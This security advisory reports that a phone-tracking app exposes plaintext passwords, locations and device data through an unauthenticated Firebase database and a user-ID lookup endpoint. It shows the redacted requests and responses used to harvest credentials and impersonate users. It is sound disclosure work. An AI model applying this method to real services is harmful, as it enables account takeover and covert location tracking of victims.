Title:

Passwords Freely Available in GirlFriend Cell Tracker App

Report ID

SIK-2017-025

Summary:

• Vendor: SoftSquare InfoSoft
• Product: Family Locator (GPS Tracker) (https://play.google.com/store/apps/details?id=com.omrup.cell.tracker)
• Affected Version: 1.20
• Severity: High
• Short summary: Attacks can easily obtain the password for an arbitrary account in the GirlFriend Cell Tracker app

Details:

The GirlFriend Cell Tracker app uses Google Firebase in combination with a private API hosted on an own server. The log in sequence works as follows: The user enters his e-mail address (which is the user name) into app. The app then requests the numeric user ID for this account name from the custom web server:

Request:

POST /****/***/login HTTP/1.1
Content-Type: application/json; charset=UTF-8
Content-Length: 28
Host: *****
Connection: close
User-Agent: okhttp/2.4.0

{"user_email":"foo@bar.com"}

Response:

HTTP/1.1 200 OK
Date: Tue, 13 Jun 2017 17:45:36 GMT
Server: Apache Phusion_Passenger/4.0.10 mod_bwlimited/1.4 mod_fcgid/2.3.9
X-Powered-By: PHP/5.6.30
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 142

{"login_data":[{"user_id":"149737514214639","user_type":"1"}],"ResponseCode":"1","ResponseMsg":"log in data","Result":"True","TimeZone":"GMT"}

With this numeric user ID, the app queries the Firebase database:

https://*****.firebaseio.com/****/******

We get the password in plain text, along with the last Location and the entered display name.

{
  last_location={
    address= Rheinstraße 75 64295 Darmstadt Germany
    date=13/06/2017
    lat=49.8717048
    long=8.6387116
    time=07:37:22 PM
  }
  user_buy=false
  user_email=foo@bar.com
  user_name=Sepp
  user_password=123456
  user_speed=0
  user_token=cQfgiDRWx9o:APA91bGTkU1N9FZo3c9ZIwReYR6nzNiFaJaRgBq_1pi07SVcLvXvPeRiqMFcXD3bzFZVwrKW3H6F84xrolHX9OaB...
  user_type=1
}

An attacker can therefore simply ask the custom server for the user IDs of arbitrary users, then query the Firebase database for the password of that user, and log into the app.

In fact, the app checks the user’s password inside the app. It requests the user password from the server and compares the result it has obtained from the server with the data the user has entered. Firebase request for the password:

https://******.firebaseio.com/****/*******/user_password

Record retrieved from the server:

DataSnapshot { key = user_password, value = 123456 }

If you submit the parent URL without the concrete user ID, you get all the data. Request:

https://*****.firebaseio.com/****

Response left out for privacy reasons. You get passwords, location data, URLs of freely accessible profile pictures, the names of the Wifi networks that users are logged on to, whether they are on Wifi or GSM, their signal strengths, the timestamp of the last location update, and the user’s battery status. Since you have the password, you can impersonate all of them. You can simply log into the app as if you were them – if you want even more data than what you already have (e.g., if you want the full location history).

Workaround

None.

Suggested Mitigation

Use a proper authentication method. Never give out data to unauthenticated users.

Timeline

• 2017-08-09: Vulnerability Discovered
• 2017-08-09: Developer contacted
• 2018-08-11: Published